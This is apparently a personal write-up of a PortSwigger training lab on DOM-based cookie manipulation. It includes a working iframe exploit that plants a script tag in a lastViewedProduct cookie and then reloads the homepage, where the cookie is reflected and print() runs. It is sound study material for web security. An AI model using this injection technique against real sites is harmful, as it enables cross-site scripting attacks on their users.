[The app stores](https://portswigger.net/web-security/dom-based/cookie-manipulation/lab-dom-cookie-manipulation) a `lastViewedProduct` cookie client-side containing the full URL of the last product visited. The homepage later **reads and reflects** this value directly into the DOM—without sanitization.
![[CleanShot 2025-04-12 at 16.43.12.png]]
**Exploit:**
Use an iframe to set a malicious `lastViewedProduct` cookie:
```html
<iframe
src="https://YOUR-LAB-ID.web-security-academy.net/product?productId=1&'><script>print()</script>"
onload="if(!window.x)this.src='https://YOUR-LAB-ID.web-security-academy.net';window.x=1;">
</iframe>
```
- The iframe loads a product URL with **injected JS**.
- The site saves this in the `lastViewedProduct` cookie.
- On second load (`onload`), the victim is redirected back to the homepage.
- The homepage reflects the cookie content → `XSS` → `print()` executed.